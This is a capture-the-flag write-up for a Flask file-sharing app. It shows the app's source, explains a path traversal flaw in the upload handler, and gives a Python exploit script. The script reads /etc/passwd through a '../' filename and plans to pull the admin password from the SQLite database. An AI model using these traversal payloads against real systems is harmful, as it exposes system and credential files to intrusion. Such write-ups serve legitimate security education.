All love for Watermelons ???
Attachments: watermelon-player.zip
In this challenge we were given a Flask application that allows users to upload their files.
app.py
from flask import Flask, request, jsonify, session, send_file
from functools import wraps
from flask_sqlalchemy import SQLAlchemy
import os, secrets
from werkzeug.utils import secure_filename
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = secrets.token_hex(20)
app.config['UPLOAD_FOLDER'] = 'files'
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True, nullable=False)
password = db.Column(db.String(120), nullable=False)
class File(db.Model):
id = db.Column(db.Integer, primary_key=True)
filename = db.Column(db.String(255), nullable=False)
filepath = db.Column(db.String(255), nullable=False)
uploaded_at = db.Column(db.DateTime, nullable=False, default=db.func.current_timestamp())
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
user = db.relationship('User', backref=db.backref('files', lazy=True))
def create_admin_user():
admin_user = User.query.filter_by(username='admin').first()
if not admin_user:
admin_user = User(username='admin', password= secrets.token_hex(20))
db.session.add(admin_user)
db.session.commit()
print("Admin user created.")
else:
print("Admin user already exists.")
with app.app_context():
db.create_all()
create_admin_user()
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'username' not in session or 'user_id' not in session:
return jsonify({"Error": "Unauthorized access"}), 401
return f(*args, **kwargs)
return decorated_function
def admin_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'username' not in session or 'user_id' not in session or not session['username']=='admin':
return jsonify({"Error": "Unauthorized access"}), 401
return f(*args, **kwargs)
return decorated_function
@app.route('/')
def index():
return 'Welcome to my file sharing API'
@app.post("/register")
def register():
if not request.json or not "username" in request.json or not "password" in request.json:
return jsonify({"Error": "Please fill all fields"}), 400
username = request.json['username']
password = request.json['password']
if User.query.filter_by(username=username).first():
return jsonify({"Error": "Username already exists"}), 409
new_user = User(username=username, password=password)
db.session.add(new_user)
db.session.commit()
return jsonify({"Message": "User registered successfully"}), 201
@app.post("/login")
def login():
if not request.json or not "username" in request.json or not "password" in request.json:
return jsonify({"Error": "Please fill all fields"}), 400
username = request.json['username']
password = request.json['password']
user = User.query.filter_by(username=username, password=password).first()
if not user:
return jsonify({"Error": "Invalid username or password"}), 401
session['user_id'] = user.id
session['username'] = user.username
return jsonify({"Message": "Login successful"}), 200
@app.get('/profile')
@login_required
def profile():
return jsonify({"username": session['username'], "user_id": session['user_id']})
@app.get('/files')
@login_required
def list_files():
user_id = session.get('user_id')
files = File.query.filter_by(user_id=user_id).all()
file_list = [{"id": file.id, "filename": file.filename, "filepath": file.filepath, "uploaded_at": file.uploaded_at} for file in files]
return jsonify({"files": file_list}), 200
@app.route("/upload", methods=["POST"])
@login_required
def upload_file():
if 'file' not in request.files:
return jsonify({"Error": "No file part"}), 400
file = request.files['file']
if file.filename == '':
return jsonify({"Error": "No selected file"}), 400
user_id = session.get('user_id')
if file:
blocked = ["proc", "self", "environ", "env"]
filename = file.filename
if filename in blocked:
return jsonify({"Error":"Why?"})
user_dir = os.path.join(app.config['UPLOAD_FOLDER'], str(user_id))
os.makedirs(user_dir, exist_ok=True)
file_path = os.path.join(user_dir, filename)
print(f"{user_dir=}\n{filename=}\n{secure_filename(filename)=}")
file.save(f"{user_dir}/{secure_filename(filename)}")
new_file = File(filename=secure_filename(filename), filepath=file_path, user_id=user_id)
db.session.add(new_file)
db.session.commit()
return jsonify({"Message": "File uploaded successfully", "file_path": file_path}), 201
return jsonify({"Error": "File upload failed"}), 500
@app.route("/file/<int:file_id>", methods=["GET"])
@login_required
def view_file(file_id):
user_id = session.get('user_id')
file = File.query.filter_by(id=file_id, user_id=user_id).first()
if file is None:
return jsonify({"Error": "File not found or unauthorized access"}), 404
try:
return send_file(file.filepath, as_attachment=True)
except Exception as e:
return jsonify({"Error": str(e)}), 500
@app.get('/admin')
@admin_required
def admin():
return os.getenv("FLAG","BHFlagY{testing_flag}")
if __name__ == '__main__':
app.run(host='0.0.0.0')
The function here that we can exploit is upload_file
function. The flaw in this is that it never checks for ../
in the filename we provide and directly stores our given filename into filepath
in the database.
def upload_file():
...
file_path = os.path.join(user_dir, filename)
print(f"{user_dir=}\n{filename=}\n{secure_filename(filename)=}")
file.save(f"{user_dir}/{secure_filename(filename)}")
new_file = File(filename=secure_filename(filename), filepath=file_path, user_id=user_id)
db.session.add(new_file)
db.session.commit()
...
Thus, if we provide a filename like ../../../etc/passwd
, we should be able to read the /etc/passwd
file, giving us an LFI vulnerability.
exploit.py
import requests
BASE_URL = 'http://localhost:5000'
session = requests.Session()
def register(username, password):
url = f"{BASE_URL}/register"
payload = {'username': username, 'password': password}
response = session.post(url, json=payload)
print(f"Register: {response.status_code} - {response.json()}")
def login(username, password):
url = f"{BASE_URL}/login"
payload = {'username': username, 'password': password}
response = session.post(url, json=payload)
print(response.cookies)
print(f"Login: {response.status_code} - {response.json()}")
def upload_file(file_path, new_filename=None):
url = f"{BASE_URL}/upload"
files = {'file': (new_filename if new_filename else file_path.split('/')[-1], open(file_path, 'rb'))}
response = session.post(url, files=files)
print(f"Upload: {response.status_code} - {response.json()}")
def list_files():
url = f"{BASE_URL}/files"
response = session.get(url)
print(f"List Files: {response.status_code} - {response.json()}")
def view_file(file_id):
url = f"{BASE_URL}/file/{file_id}"
response = session.get(url)
if response.status_code == 200:
with open(f"downloaded_{file_id}.file", 'wb') as f:
f.write(response.content)
print(f"File {file_id} downloaded successfully.")
else:
print(f"View File: {response.status_code} - {response.json()}")
def admin_access():
url = f"{BASE_URL}/admin"
response = session.get(url)
print(f"Admin Access: {response.status_code} - {response.text}")
if __name__ == "__main__":
register('demo', 'demo')
login('demo', 'demo')
file_path = './demo.txt'
new_filename = '../../../../etc/passwd'
upload_file(file_path, new_filename)
list_files()
view_file(1)
Running the above script downloads the /etc/passwd
file for us. Which means that our LFI was successful.
Now we simply had to get the flag from the environment variables. A simple solution would be to read the /proc/self/environ
file which contains the environment variables but because the server is checking the blocked
words in filename which prevents us from reading the environ
file (although the way it is checking the blocked
words is incorrect, when trying to read the /environ
file it didn’t work).
So a simple way to get the flag was to read the sqlite
database (/app/instance/db.db
) which would give us the admin password
and then we can use that to login as admin and then navigate to /admin
to get the flag.